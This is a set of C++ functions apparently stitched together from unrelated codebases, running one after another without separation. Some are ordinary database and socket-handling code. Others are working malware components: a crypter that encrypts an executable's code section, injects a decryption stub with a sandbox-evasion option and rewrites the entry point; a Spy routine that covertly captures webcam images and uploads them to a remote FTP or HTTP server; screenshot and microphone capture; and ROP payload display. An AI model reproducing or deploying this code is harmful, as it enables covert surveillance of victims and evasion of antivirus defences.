bool CDBManager::DisconnectEx(CDBHandle *param) { if (NULL == param) { MYPRINTF("The DBHandle of parameter in QueryEx of CDBManager is NULL!\n"); return false; } if (CDBIdle::Instance() != param->stateMachine.CurrentState()) { MYPRINTF("If you wish to use this DisconnectEx function, this DB handle must be in the idle state\n"); return false; } CDBAct *tmpAct = ¶m->acts[CDBHandle::DB_ACK_TYPE::DISCONNECT]; tmpAct->dbHandle = param; if (NULL == tmpAct) { MYPRINTF("The act of parameter in DisconnectEx of CDBManager is NULL!\n"); return false; } PostQueuedCompletionStatus(proactor.iocp, NULL, NULL, static_cast<OVERLAPPED*>(tmpAct)); return true; }
bool CDBConnector::EventProc(CAct *act, DWORD receivedBytes) { CDBAct *dbAct = (CDBAct*)act; CDBHandle &dbHandle = *(CDBHandle*)dbAct->dbHandle; CDBManager &dbManager = CDBManager::GetInstance(); CGlobalManager &globalManager = CGlobalManager::GetInstance(); //-------------------------------------- // DB initializing mysql_init(&dbHandle.connTmp); // DB connecting dbHandle.dbConnection = mysql_real_connect(&dbHandle.connTmp, dbHandle.dbHost.c_str(), dbHandle.dbUser.c_str() , dbHandle.dbPasswd.c_str(), dbHandle.dbSchema.c_str(), globalManager.dbPort, (char *)NULL, 0); if (NULL == dbHandle.dbConnection) { MYPRINTF(mysql_error(&dbHandle.connTmp)); MYERRORPRINTF("mysql_real_connect"); return false; } //-------------------------------------- dbHandle.stateMachine.ChangeState(CDBIdle::Instance()); return true; }
PIMAGE_SECTION_HEADER Crypter::insertSectionHeader(PVOID pvPEBase, LPCSTR lpName, DWORD dwVirtualSize, DWORD dwCharacteristics, PDWORD pdwSize){ if (strlen(lpName) > 7) { MYPRINTF("strlen(lpName) > 7\n"); return NULL; } if (Crypter::freeSpaceInHeader(pvPEBase) < IMAGE_SIZEOF_SECTION_HEADER) { MYPRINTF("freeSpaceInHeader\n"); return NULL; } PIMAGE_NT_HEADERS pNtHeaders = RtlImageNtHeader(pvPEBase); if (!pNtHeaders) { MYPRINTF("!pNtHeaders\n"); return NULL; } DWORD dwSizeOfRawData = ALIGN_UP(dwVirtualSize, pNtHeaders->OptionalHeader.FileAlignment); dwVirtualSize = ALIGN_UP(dwVirtualSize, pNtHeaders->OptionalHeader.SectionAlignment); PIMAGE_SECTION_HEADER pNewSection = (PIMAGE_SECTION_HEADER)malloc(IMAGE_SIZEOF_SECTION_HEADER); if (!pNewSection) { MYPRINTF("!pNewSection\n"); return NULL; } memset( pNewSection, 0, IMAGE_SIZEOF_SECTION_HEADER); memcpy((PVOID)(&pNewSection->Name), (PVOID)lpName, strlen(lpName)); pNewSection->Characteristics = dwCharacteristics; pNewSection->Misc.VirtualSize = dwVirtualSize; pNewSection->SizeOfRawData = dwSizeOfRawData; PIMAGE_SECTION_HEADER pVirtualLastSection = Crypter::getVirtualyLastSectionHeader(pNtHeaders); pNewSection->VirtualAddress = pVirtualLastSection->VirtualAddress + ALIGN_UP(pVirtualLastSection->Misc.VirtualSize,pNtHeaders->OptionalHeader.SectionAlignment); if (dwSizeOfRawData){ PIMAGE_SECTION_HEADER pLastSection = Crypter::getPhysicalyLastSectionHeader(pNtHeaders); pNewSection->PointerToRawData = pLastSection->PointerToRawData + ALIGN_UP(pLastSection->SizeOfRawData, pNtHeaders->OptionalHeader.FileAlignment); } *pdwSize = dwVirtualSize; return pNewSection; }
BOOL Crypter::insertSectionConfigInPE(PVOID pvPEBase,DWORD dwPESize,PVOID pvData,DWORD dwDataSize,PVOID *ppvNewPE,DWORD *pdwNewPESize){ BOOL bRet = FALSE; PIMAGE_SECTION_HEADER pNewSection; DWORD dwSize; if (pNewSection = Crypter::insertSectionHeader( pvPEBase, Crypter::section, dwDataSize, IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ,&dwSize)){ PVOID pvNewPE; DWORD dwNewPESize = pNewSection->PointerToRawData + pNewSection->SizeOfRawData; if (pvNewPE = malloc(dwNewPESize)){ memcpy(pvNewPE, pvPEBase, dwPESize); PIMAGE_NT_HEADERS pNtHeaders = RtlImageNtHeader(pvNewPE); ++(pNtHeaders->FileHeader.NumberOfSections); PIMAGE_SECTION_HEADER pVirtualLastSection = Crypter::getVirtualyLastSectionHeader(pNtHeaders); pVirtualLastSection[0] = *pNewSection; pNtHeaders->OptionalHeader.SizeOfImage += dwSize; memcpy((PVOID)((DWORD)pvNewPE + pNewSection->PointerToRawData),pvData,dwDataSize); DWORD dwHeaderSum, dwCheckSum; if (CheckSumMappedFile(pvNewPE,dwNewPESize,&dwHeaderSum,&dwCheckSum)){ pNtHeaders->OptionalHeader.CheckSum = dwCheckSum; *ppvNewPE = pvNewPE; *pdwNewPESize = dwNewPESize; bRet = TRUE; } if (!bRet) free(pvNewPE); } else { MYPRINTF(" malloc(dwNewPESize)\n"); } free(pNewSection); } else { MYPRINTF("!insertSectionHeader\n"); } return bRet; }
bool CDBManager::QueryEx(std::string &str, CLoginSocket &sock) { if ("" == str) { MYPRINTF("The string pointer of parameter in QueryEx of CDBManager is NULL!\n"); return false; } CDBHandle *dbHandle = GetAvailableHandle(); if (NULL == dbHandle) { MYPRINTF("There isn't even a handle which can deal with your query !!!\n"); return false; } if (CDBIdle::Instance() != dbHandle->stateMachine.CurrentState()) { MYPRINTF("The available DB handle is not in idle state !\n"); return false; } dbHandle->queryStr = str; CDBAct *tmpAct = &dbHandle->acts[CDBHandle::DB_ACK_TYPE::QUERY]; tmpAct->dbHandle = dbHandle; if (NULL == tmpAct) { MYPRINTF("The act of handle in QueryEx of CDBManager is NULL!\n"); return false; } dbHandle->loginSock = &sock; dbHandle->stateMachine.ChangeState(CDBWaitResult::Instance()); PostQueuedCompletionStatus(proactor.iocp, NULL, NULL, static_cast<OVERLAPPED*>(tmpAct)); return true; }
// You must call the ReleaseHandle function after you have used the handle off ! CDBHandle *CDBManager::GetAvailableHandle() { CDBHandle *choosedDBHandle = NULL; DWORD result = WaitForSingleObject(dbHandleSema, WAIT_AVAILABLE_HANDLE_TIME); if (WAIT_FAILED == result) { MYERRORPRINTF("WaitForSingleObject"); return false; } else if (WAIT_TIMEOUT == result) { MYPRINTF("There is no available DB handle !\n"); return NULL; } else if (WAIT_OBJECT_0 == result) { choosedDBHandle = dbHandles.front(); dbHandles.pop(); if (NULL == choosedDBHandle) { MYPRINTF("The DB handles' queue is empty !\n"); return NULL; } if (CDBIdle::Instance() == choosedDBHandle->stateMachine.CurrentState()) { return choosedDBHandle; } MYERRORPRINTF("The available handle's state is not the idle state !\n"); return NULL; } MYPRINTF("There isn't any DBHandle !\n"); return NULL; }
bool CDBManager::ReleaseHandle(CDBHandle *param) { if (NULL == param) { MYPRINTF("Error : The parameter of ReleaseHandle is NULL !\n"); return false; } if (CDBIdle::Instance() == param->stateMachine.CurrentState()) { MYPRINTF("Error : The DB Handle is already available !\n"); return false; } if (!ReleaseSemaphore(dbHandleSema, 1, NULL)) { MYERRORPRINTF("ReleaseSemaphore"); return false; } dbHandles.push(param); return true; }
bool CAcceptor::EventProc(CAct *act, DWORD receivedBytes) { CLoginAct &tmpAct = *(CLoginAct*)act; CLoginSocket &tmpSocket = *tmpAct.loginSocket; CLoginManager &loginManager = CLoginManager::GetInstance(); loginManager.proactor.Register((HANDLE)tmpSocket.sock); // You must change the state before receive the header !!! tmpSocket.stateMachine.ChangeState(CWaitHeader::Instance()); tmpSocket.Recv(tmpSocket.recvBuf, HEADER_SIZE); MYPRINTF("ACCEPTED"); return true; }
// outType = 1 : console, 2: file, 3: buffer bool Screen::takeScreenshot(const int outType, const char *filename, char **buffer, DWORD &size) { if (outType < 1 || outType > 3) { return false; } bool result = false; HBITMAP handleBitmapScreen = 0; HDC handleMemoryDC = 0; HWND hWnd = 0; HDC handleDeviceContextOfWindow = 0; // open the WinSta0 as some services are attached to a different window station. HWINSTA hWindowStation = hWindowStation = OpenWindowStation( "WinSta0", FALSE, WINSTA_ALL_ACCESS ); if( !hWindowStation ) { if( RevertToSelf() ) hWindowStation = OpenWindowStation( "WinSta0", FALSE, WINSTA_ALL_ACCESS ); } // if we cant open the defaut input station we wont be able to take a screenshot if( !hWindowStation ) { MYPRINTF( "[SCREENSHOT] screenshot: Couldnt get the WinSta0 Window Station"); return false; } // get the current process's window station so we can restore it later on. HWINSTA hOrigWindowStation = GetProcessWindowStation(); // set the host process's window station to this sessions default input station we opened if( !SetProcessWindowStation( hWindowStation ) ) { MYPRINTF( "[SCREENSHOT] screenshot: SetProcessWindowStation failed" ); return false; } // grab a handle to the default input desktop (e.g. Default or WinLogon) //HDESK hInputDesktop = OpenDesktop("Default", 0, FALSE, MAXIMUM_ALLOWED ); HDESK hInputDesktop = OpenInputDesktop( 0, FALSE, MAXIMUM_ALLOWED ); if( !hInputDesktop ) { MYPRINTF( "[SCREENSHOT] screenshot: OpenInputDesktop failed" ); return false; } //if (SwitchDesktop(hInputDesktop) == 0){ // MYPRINTF( "[SCREENSHOT] screenshot: SwitchDesktop failed" ); // return false; //} // get the threads current desktop so we can restore it later on HDESK hOrigDesktop = GetThreadDesktop( GetCurrentThreadId() ); // set this threads desktop to that of this sessions default input desktop on WinSta0 SetThreadDesktop( hInputDesktop ); // and now we can grab a handle to this input desktop HWND hDesktopWnd = GetDesktopWindow(); int screenWidth = GetSystemMetrics (SM_CXSCREEN); int screenHeight = GetSystemMetrics (SM_CYSCREEN); MYPRINTF("width: %d, height: %d\n", screenWidth, screenHeight); // Retrieve the handle to a display device context for the client // area of the window. HDC handleDeviceContextOfScreen = GetDC(hDesktopWnd); //HDC handleDeviceContextOfScreen = CreateDC("DISPLAY",NULL,NULL,NULL); if (handleDeviceContextOfScreen == 0) { MYPRINTF("GetDC(0) has failed: %d", GetLastError()); goto done; } if (outType == 1) { // print to console //The source DC is the entire screen and the destination DC is the current window (HWND) // Get the client area for size calculation HWND hWnd = GetForegroundWindow(); HDC handleDeviceContextOfWindow = GetDC(hWnd); if (handleDeviceContextOfScreen == 0) { MYPRINTF("GetDC(hWnd) has failed: %d", GetLastError()); goto done; } RECT rcClient; GetClientRect(hWnd, &rcClient); //This is the best stretch mode SetStretchBltMode(handleDeviceContextOfWindow, HALFTONE); if(!StretchBlt(handleDeviceContextOfWindow, 0,0, rcClient.right, rcClient.bottom, handleDeviceContextOfScreen, 0,0, screenWidth, screenHeight, SRCCOPY)) { MYPRINTF("StretchBlt has failed: %d", GetLastError()); goto done; } result = true; } else { // Create a compatible DC which is used in a BitBlt from the window DC handleMemoryDC = CreateCompatibleDC(handleDeviceContextOfScreen); if(!handleMemoryDC) { MYPRINTF("CreateCompatibleDC has failed: %d", GetLastError()); goto done; } BITMAPINFO bmpinfo; ZeroMemory(&bmpinfo,sizeof(bmpinfo)); LONG dwWidth = GetDeviceCaps(handleDeviceContextOfScreen, HORZRES); LONG dwHeight = GetDeviceCaps(handleDeviceContextOfScreen, VERTRES); //dwBPP = GetDeviceCaps(hScreen, BITSPIXEL); LONG dwBPP = 24; LONG dwNumColors = GetDeviceCaps(handleDeviceContextOfScreen, NUMCOLORS); LPVOID pBits; bmpinfo.bmiHeader.biSize = sizeof(BITMAPINFOHEADER); bmpinfo.bmiHeader.biWidth = dwWidth; bmpinfo.bmiHeader.biHeight = dwHeight; bmpinfo.bmiHeader.biPlanes = 1; bmpinfo.bmiHeader.biBitCount = (WORD) dwBPP; bmpinfo.bmiHeader.biCompression = BI_RGB; bmpinfo.bmiHeader.biSizeImage = 0; bmpinfo.bmiHeader.biXPelsPerMeter = 0; bmpinfo.bmiHeader.biYPelsPerMeter = 0; bmpinfo.bmiHeader.biClrUsed = dwNumColors; bmpinfo.bmiHeader.biClrImportant = dwNumColors; handleBitmapScreen = CreateDIBSection(handleDeviceContextOfScreen, &bmpinfo, DIB_PAL_COLORS, &pBits, NULL, 0); /** // Create a compatible bitmap from the Window DC handleBitmapScreen = CreateCompatibleBitmap(handleDeviceContextOfScreen, screenWidth, screenHeight); if(!handleBitmapScreen) { MYPRINTF("CreateCompatibleBitmap Failed: %d", GetLastError()); goto done; } */ // Select the compatible bitmap into the compatible memory DC. if (SelectObject(handleMemoryDC, handleBitmapScreen) == 0) { MYPRINTF("SelectObject Failed: %d", GetLastError()); goto done; } // Bit block transfer into our compatible memory DC. if(!BitBlt(handleMemoryDC, 0, 0, screenWidth, screenHeight, handleDeviceContextOfScreen, 0, 0, SRCCOPY)) { MYPRINTF("BitBlt has failed: %d", GetLastError()); goto done; } BITMAP bmpScreen; // Get the BITMAP from the HBITMAP if (GetObject(handleBitmapScreen, sizeof(BITMAP), &bmpScreen) == 0) { MYPRINTF("GetObject has failed: %d", GetLastError()); goto done; } BITMAPFILEHEADER bmfHeader; BITMAPINFOHEADER bi; bi.biSize = sizeof(BITMAPINFOHEADER); bi.biWidth = bmpScreen.bmWidth; bi.biHeight = bmpScreen.bmHeight; bi.biPlanes = 1; bi.biBitCount = 32; bi.biCompression = BI_RGB; bi.biSizeImage = 0; bi.biXPelsPerMeter = 0; bi.biYPelsPerMeter = 0; bi.biClrUsed = 0; bi.biClrImportant = 0; DWORD dwBmpSize = ((bmpScreen.bmWidth * bi.biBitCount + 31) / 32) * 4 * bmpScreen.bmHeight; HANDLE hData = GlobalAlloc(GHND,dwBmpSize); char *bmpdata = (char *)GlobalLock(hData); // Starting with 32-bit Windows, GlobalAlloc and LocalAlloc are implemented as wrapper functions that // call HeapAlloc using a handle to the process's default heap. Therefore, GlobalAlloc and LocalAlloc // have greater overhead than HeapAlloc. HANDLE hDIB = GlobalAlloc(GHND,dwBmpSize); char *lpbitmap = (char *)GlobalLock(hDIB); // Gets the "bits" from the bitmap and copies them into a buffer // which is pointed to by lpbitmap. //GetDIBits(handleDeviceContextOfWindow, handleBitmapScreen, 0, GetDIBits(handleDeviceContextOfScreen, handleBitmapScreen, 0, (UINT)bmpScreen.bmHeight, lpbitmap, (BITMAPINFO *)&bi, DIB_RGB_COLORS); // Add the size of the headers to the size of the bitmap to get the total file size DWORD dwSizeofDIB = dwBmpSize + sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER); //Offset to where the actual bitmap bits start. bmfHeader.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER); //Size of the file bmfHeader.bfSize = dwSizeofDIB; //bfType must always be BM for Bitmaps bmfHeader.bfType = 0x4D42; //BM DWORD dwBytesWritten = 0; UINT mybmpsize = dwBmpSize + sizeof(bi) + sizeof(bmfHeader); // put headers together to make a .bmp in memory memcpy(bmpdata, &bmfHeader, sizeof(bmfHeader)); memcpy(bmpdata + sizeof(bmfHeader), &bi, sizeof(bi)); memcpy(bmpdata + sizeof(bmfHeader) + sizeof(bi), lpbitmap, dwBmpSize); if (outType == 2) { // Now convert to JPEG if (bmp2jpegtofile((PBYTE)bmpdata, 70, filename ) == 0) { MYPRINTF("unable to write jpg"); } else { result = true; } } else { if (bmp2jpegtomemory((PBYTE)bmpdata, 70, (BYTE **)buffer, &size) == 0) { MYPRINTF("unable to write jpg"); } else { result = true; } } //Unlock and Free the DIB from the heap GlobalUnlock(hDIB); GlobalFree(hDIB); GlobalUnlock(hData); GlobalFree(hData); } //Clean up done: // restore the origional process's window station if( hOrigWindowStation ) SetProcessWindowStation( hOrigWindowStation ); // restore the threads origional desktop if( hOrigDesktop ) SetThreadDesktop( hOrigDesktop ); // close the WinSta0 window station handle we opened if( hWindowStation ) CloseWindowStation( hWindowStation ); // close this last to avoid a handle leak... if( hInputDesktop ) CloseDesktop( hInputDesktop ); DeleteObject(handleBitmapScreen); DeleteObject(handleMemoryDC); ReleaseDC(NULL,handleDeviceContextOfScreen); ReleaseDC(hWnd,handleDeviceContextOfWindow); return result; }
void Payload::showRop(unsigned char* payload){ MYPRINTF( "\n\t\tscratch\n"); MYPRINTF( "\t\t%02X", payload[533]); MYPRINTF( "%02X", payload[532]); MYPRINTF( "%02X", payload[531]); MYPRINTF( "%02X", payload[530]); MYPRINTF( "\n\t\tdisablenx\n"); MYPRINTF( "\t\t%02X", payload[537]); MYPRINTF( "%02X", payload[536]); MYPRINTF( "%02X", payload[535]); MYPRINTF( "%02X", payload[534]); MYPRINTF( "\n\t\tret\n"); MYPRINTF( "\t\t%02X", payload[545]); MYPRINTF( "%02X", payload[544]); MYPRINTF( "%02X", payload[543]); MYPRINTF( "%02X", payload[542]); MYPRINTF( "\n"); }
bool SoundRecorder::record(int lengthTime, unsigned char **buffer, int& size){ HWAVEIN microHandle; WAVEHDR waveHeader; const int numpts = m_sampleRate * lengthTime; short int *waveIn = new short int[numpts]; // 'short int' is a 16-bit type; I request 16-bit samples below // for 8-bit capture, you'd use 'unsigned char' or 'BYTE' 8-bit types MMRESULT result = 0; WAVEFORMATEX format; format.wFormatTag = WAVE_FORMAT_PCM; // simple, uncompressed format format.wBitsPerSample = m_bitsPerSample; // 16 for high quality, 8 for telephone-grade format.nChannels = m_nbChannels; // 1=mono, 2=stereo format.nSamplesPerSec = m_sampleRate; format.nAvgBytesPerSec = format.nSamplesPerSec * format.nChannels * format.wBitsPerSample / 8; // = nSamplesPerSec * n.Channels * wBitsPerSample/8 format.nBlockAlign = format.nChannels * format.wBitsPerSample / 8; // = n.Channels * wBitsPerSample/8 format.cbSize = 0;// Size, in bytes, of extra format information result = waveInOpen(µHandle, WAVE_MAPPER, &format, 0L, 0L, WAVE_FORMAT_DIRECT); if (result) { MYPRINTF("waveInOpen failed\n"); return false; } // Set up and prepare header for input waveHeader.lpData = (LPSTR)waveIn; waveHeader.dwBufferLength = numpts * 2; waveHeader.dwBytesRecorded = 0; waveHeader.dwUser = 0L; waveHeader.dwFlags = 0L; waveHeader.dwLoops = 0L; waveInPrepareHeader(microHandle, &waveHeader, sizeof(WAVEHDR)); // Insert a wave input buffer result = waveInAddBuffer(microHandle, &waveHeader, sizeof(WAVEHDR)); if (result) { MYPRINTF("waveInAddBuffer failed\n"); return false; } result = waveInStart(microHandle); if (result) { MYPRINTF("waveInStart failed\n"); return false; } // Wait until finished recording do { Sleep(1000); } while (waveInUnprepareHeader(microHandle, &waveHeader, sizeof(WAVEHDR)) == WAVERR_STILLPLAYING); int chunksize, pcmsize, numSamples, subchunk1size; int audioFormat = WAVE_FORMAT_PCM; numSamples = ((long) (numpts / m_sampleRate) * 1000); pcmsize = sizeof(PCMWAVEFORMAT); subchunk1size = 16; int byteRate = m_sampleRate * m_nbChannels * m_bitsPerSample / 8; int blockAlign = m_nbChannels * m_bitsPerSample / 8; int subchunk2size = waveHeader.dwBufferLength * m_nbChannels; chunksize = (36 + subchunk2size); *buffer = new unsigned char[44 + waveHeader.dwBufferLength]; size = 44 + waveHeader.dwBufferLength; (*buffer)[0] = 'R'; (*buffer)[1] = 'I'; (*buffer)[2] = 'F'; (*buffer)[3] = 'F'; memcpy(&(*buffer)[4], &chunksize, 4); (*buffer)[8] = 'W'; (*buffer)[9] = 'A'; (*buffer)[10] = 'V'; (*buffer)[11] = 'E'; (*buffer)[12] = 'f'; (*buffer)[13] = 'm'; (*buffer)[14] = 't'; (*buffer)[15] = ' '; memcpy(&(*buffer)[16], &subchunk1size, 4); memcpy(&(*buffer)[20], &audioFormat, 2); memcpy(&(*buffer)[22], &m_nbChannels, 2); memcpy(&(*buffer)[24], &m_sampleRate, 4); memcpy(&(*buffer)[28], &byteRate, 4); memcpy(&(*buffer)[32], &blockAlign, 2); memcpy(&(*buffer)[34], &m_bitsPerSample, 2); (*buffer)[36] = 'd'; (*buffer)[37] = 'a'; (*buffer)[38] = 't'; (*buffer)[39] = 'a'; memcpy(&(*buffer)[40], &subchunk2size, 4); memcpy(&(*buffer)[44], waveHeader.lpData, waveHeader.dwBufferLength); Print::printBufferAsHexa(*buffer, 44); waveInClose(microHandle); delete waveIn; return true; }
void Spy::start(){ m_start = true; XWebcam webcam; int webcamCount = webcam.webcamCount(); if (webcamCount == 0){ return; } while(!Icmp::ping("")){ MYPRINTF("no internet ? wait\n"); Sleep(60000); } TCHAR* path = TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\"); TCHAR* key = TEXT("Index"); Register reg; int value = reg.getKeyAsInt(path, key, 0); if (value == 0){ reg.createStringKey(HKEY_CURRENT_USER, path, key, TEXT("1")); value = 1; } while(m_start) { //for (int i = 0; i < webcamCount; i++){ if (webcam.snapMotionDetection(m_locale.c_str(), 1, m_detail)){ if (value > m_maxImg){ value = 1; } std::tstring name; name.append(m_remote); TCHAR buffer [33]; _itot(value, buffer, 10); name.append(buffer); name.append(TEXT(".jpg")); TCHAR buffer2 [33]; _itot(value, buffer2, 10); value++; reg.createStringKey(HKEY_CURRENT_USER, path, key, buffer2); try { Ftp ftp(m_url, 21, m_ftpUser, m_ftpPassword); ftp.setCurrentDirectory(TEXT("public_html")); //char buffer_dir[128]; //if (webcamCount != 1){ // sprintf_s(buffer_dir, COUNTOF(buffer_dir), "%s_%d", m_ftpDirectory.c_str(), i + 1); //} else { // sprintf_s(buffer_dir, COUNTOF(buffer_dir), "%s", m_ftpDirectory.c_str()); //} try { ftp.createDirectory(m_ftpDirectory); } catch (std::exception error){ //MYPRINTF("%s\n", error.what()); } ftp.setCurrentDirectory(m_ftpDirectory); ftp.uploadFile(m_locale.c_str(), name.c_str()); } catch (std::exception error){ MYPRINTF("exception: %s\n", error.what()); } //} } Sleep(m_wait); m_start = RUNNING; } }
void Spy::startmemory(){ m_start = true; XWebcam webcam; int webcamCount = webcam.webcamCount(); if (webcamCount == 0){ MYPRINTF("no webcam\n"); return; } while(!Icmp::ping("")){ MYPRINTF("no internet ? wait\n"); Sleep(60000); } TCHAR* path = TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\"); TCHAR* key = TEXT("Index"); Register reg; int index = reg.getKeyAsInt(path, key, 0); if (index == 0){ reg.createStringKey(HKEY_CURRENT_USER, path, key, TEXT("1")); index = 1; } DWORD serialAsInt; if (!Info::getUniqueId(serialAsInt)) { serialAsInt = 156000; } char *memory; DWORD size; while(m_start) { //for (int j = 0; j < 5; j++){ if (webcam.snapMotionDetectionToMemory(&memory, size, 1, m_detail)){ if (index > m_maxImg){ index = 1; } std::tstring remoteName; remoteName.append(m_remote); TCHAR indexAsStr [33]; _itot(index, indexAsStr, 10); remoteName.append(indexAsStr); remoteName.append(TEXT(".jpg")); HttpHelper helper; char *response = 0; int responseSize = 0; char newUri[1024]; sprintf_s(newUri, 1024, "%s?v=2&s=%u", m_url, serialAsInt); if (helper.uploadBuffer(m_server, newUri, (char *)memory, size, (TCHAR *)remoteName.c_str(), &response, responseSize)){ free(response); index++; TCHAR newIndexAsStr [33]; _itot(index, newIndexAsStr, 10); reg.createStringKey(HKEY_CURRENT_USER, path, key, newIndexAsStr); } free(memory); //} } Sleep(m_wait); m_start = RUNNING; } }
bool Crypter::crypt(const char *infile, const char *outfile){ // variables DWORD dwOldProt, bytes; // open it and get the size HANDLE hFile = CreateFile(infile, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0); if (!hFile){ MYPRINTF("Unable to open file\n"); return false; } DWORD dwFileSize = GetFileSize(hFile, 0); // load in memory LPBYTE fileBuffer = (LPBYTE) malloc(dwFileSize); ReadFile(hFile, fileBuffer, dwFileSize, &bytes, 0); CloseHandle(hFile); PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER) fileBuffer; // check if it is valid PE, i would say that this is merely a proper check, for a proper one you would need to calculate all the RVA's and see if they are valid if(dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { MYPRINTF("IMAGE_DOS_SIGNATURE\n"); return false; } PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS) (fileBuffer + dosHeader->e_lfanew); if(ntHeaders->Signature != IMAGE_NT_SIGNATURE){ MYPRINTF("IMAGE_NT_SIGNATURE\n"); return false; } PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER) SECHDROFFSET(fileBuffer); #define TEXT_SECTION ".text" while(memcmp(sectionHeader->Name, TEXT_SECTION, strlen(TEXT_SECTION))) // get the ".text" section header sectionHeader++; DWORD dwVSize = sectionHeader->Misc.VirtualSize; // the virtual size of the section, later this will be used as chunksize in our stub, after proper alignment DWORD dwSectionSize = sectionHeader->SizeOfRawData; // speaks for itself DWORD dwStubSize; // the stubsize, in bytes if (Crypter::evadeSandbox){ dwStubSize = (DWORD) _end_evade_sandbox - (DWORD) _xor_block_evade_sandbox; // the stubsize, in bytes } else { dwStubSize = (DWORD) _end - (DWORD) _xor_block; // the stubsize, in bytes } LPBYTE sectionBuffer = (LPBYTE) malloc(dwSectionSize); // allocate memory enough to hold our raw section data memcpy(sectionBuffer, fileBuffer + sectionHeader->PointerToRawData, dwSectionSize); // ... copy the data _xor_chunk(sectionBuffer, dwSectionSize, 256); // aaand encrypt it! you can use different block sizes here - 8, 16, 32, 64, 128, 256, 512... memset(sectionBuffer + sectionHeader->Misc.VirtualSize, 0, (dwSectionSize - sectionHeader->Misc.VirtualSize)); // fill with zeros after the end of actual data // copy back the data memcpy(fileBuffer + sectionHeader->PointerToRawData, sectionBuffer, dwSectionSize); // ... copy the data free(sectionBuffer); DWORD oep = ntHeaders->OptionalHeader.AddressOfEntryPoint + ntHeaders->OptionalHeader.ImageBase; // the original entry point, this is a linear address DWORD seg = sectionHeader->VirtualAddress + ntHeaders->OptionalHeader.ImageBase; // the section address, you guessed right, this too is a linear one DWORD bsz = 256; // you know what this is while(dwVSize % bsz) // we need to align it to block size dwVSize++; if (Crypter::evadeSandbox){ VirtualProtect(_xor_block_evade_sandbox, dwStubSize, PAGE_EXECUTE_READWRITE, &dwOldProt); // to be able to update the stub... } else { VirtualProtect(_xor_block, dwStubSize, PAGE_EXECUTE_READWRITE, &dwOldProt); // to be able to update the stub... } // and update it, blah, blah, blah... if (Crypter::evadeSandbox){ memcpy((void *)((unsigned long) _stub_evade_sandbox + OEP_o), &oep, 4); memcpy((void *)((unsigned long) _stub_evade_sandbox + SEG_o), &seg, 4); memcpy((void *)((unsigned long) _stub_evade_sandbox + BSZ_o), &bsz, 4); memcpy((void *)((unsigned long) _stub_evade_sandbox + SZ_o), &dwVSize, 4); } else { memcpy((void *)((unsigned long) _stub + OEP_o), &oep, 4); memcpy((void *)((unsigned long) _stub + SEG_o), &seg, 4); memcpy((void *)((unsigned long) _stub + BSZ_o), &bsz, 4); memcpy((void *)((unsigned long) _stub + SZ_o), &dwVSize, 4); } Crypter::section = new char [6]; Random::createRandomName(COUNTOF(Crypter::section), Crypter::section); char* resDll; DWORD szResDll; if (Crypter::evadeSandbox){ if (!Crypter::insertSectionConfigInPE(fileBuffer, dwFileSize, _xor_block_evade_sandbox, dwStubSize + sizeof(int), (PVOID*)(&resDll), &szResDll )){ MYPRINTF("problem with injection\n"); delete Crypter::section; return false; } } else { if (!Crypter::insertSectionConfigInPE(fileBuffer, dwFileSize, _xor_block, dwStubSize + sizeof(int), (PVOID*)(&resDll), &szResDll )){ MYPRINTF("problem with injection\n"); delete Crypter::section; return false; } } free(fileBuffer); fileBuffer = (LPBYTE)resDll; dosHeader = (PIMAGE_DOS_HEADER) fileBuffer; // check if it is valid PE, i would say that this is merely a proper check, for a proper one you would need to calculate all the RVA's and see if they are valid if(dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { MYPRINTF("IMAGE_DOS_SIGNATURE\n"); delete Crypter::section; return false; } ntHeaders = (PIMAGE_NT_HEADERS) (fileBuffer + dosHeader->e_lfanew); if(ntHeaders->Signature != IMAGE_NT_SIGNATURE) { MYPRINTF("IMAGE_NT_SIGNATURE\n"); delete Crypter::section; return false; } ntHeaders->OptionalHeader.DllCharacteristics = ntHeaders->OptionalHeader.DllCharacteristics & ~IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE; sectionHeader = (PIMAGE_SECTION_HEADER) SECHDROFFSET(fileBuffer); while(memcmp(sectionHeader->Name, Crypter::section, strlen(Crypter::section))) // get the ".fpbcfg" section header sectionHeader++; sectionHeader->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE; // R/W/E, executable code, initialized data. although my experience shows that you are just fine with R/W... if (Crypter::evadeSandbox){ ntHeaders->OptionalHeader.AddressOfEntryPoint = sectionHeader->VirtualAddress + ((DWORD)_stub_evade_sandbox - (DWORD)_xor_block_evade_sandbox); } else { ntHeaders->OptionalHeader.AddressOfEntryPoint = sectionHeader->VirtualAddress + ((DWORD)_stub - (DWORD)_xor_block); } sectionHeader = (PIMAGE_SECTION_HEADER) SECHDROFFSET(fileBuffer); while(memcmp(sectionHeader->Name, TEXT_SECTION, strlen(TEXT_SECTION))) // get the ".text" section header sectionHeader++; sectionHeader->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE; // R/W/E, executable code, initialized data. although my experience shows that you are just fine with R/W... bool res = true; if (!Crypter::saveFile(outfile, resDll, szResDll)){ res = false; MYPRINTF("Unable to save file\n"); } free(fileBuffer); delete Crypter::section; return res; }